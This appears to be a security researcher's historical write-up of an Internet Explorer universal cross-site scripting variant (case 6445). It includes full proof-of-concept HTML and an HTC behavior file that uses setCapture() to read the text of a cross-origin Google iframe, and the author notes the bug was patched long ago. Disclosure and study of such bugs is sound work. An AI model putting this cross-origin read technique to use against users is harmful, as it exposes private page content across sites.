UXSS - HTC setCapture Variation - Case 6445

Another variation of the setCapture() UXSS (originally case #6445). The original used setCapture() on the top window; the first variation used it inside a same-domain IFRAME. This one moves the setCapture() call into an HTC (HTML Component) behavior file, which gives it yet another context that wasn’t covered by the earlier patches.

index.html:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>xDomHTCsetCapture_variation_case6445</title></head>
<body style="behavior:url(setcapture.htc)">
<font face="Tahoma" size="2">
<center>
<h2>xDomHTCsetCapture_variation_case6445</h2>
</center>
This is another variation of the case #6445.<br />
The original was a setCapture() of the top window that grabbed the <font color="blue"><b>event.srcElement</b></font> of any
iframe/domain. That one was <u>patched</u> and we found a variation <b>[WOOBR #953750]</b> doing the setCapture() inside an IFRAME on the same domain.
That first variation was able to grab the <font color="blue"><b>event.srcElement</b></font> of any iframe again.
<br /><br />
This one does not use iframes -to do the setCapture- at all. It's doing the setCapture <u>inside</u> an
<font color="red"><b>htc</b> document</font>, being able to grab the srcElement across domains.<br /><br />

<center>
<b>Click inside the Google IFRAME to see it's <font color="blue">innerText</font>.</b> <br />
<iframe src="http://www.google.com" width="400" height="200"></iframe>
</center>
</font>
</body>
</html>

setcapture.htc:

<html>
<body>
<script language="JavaScript">
document.body.setCapture();
document.onclick=function()
{
	alert(event.srcElement.ownerDocument.documentElement.innerText);
}
</script>
</body>
</html>

HTC behavior files run in a separate document context attached to the element they’re applied to. When setCapture() is called from within the HTC document, all mouse events are routed through it — including events that originate in cross-origin IFRAMEs. The event.srcElement then walks back to the cross-origin document, and ownerDocument.documentElement.innerText reads the entire page text.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.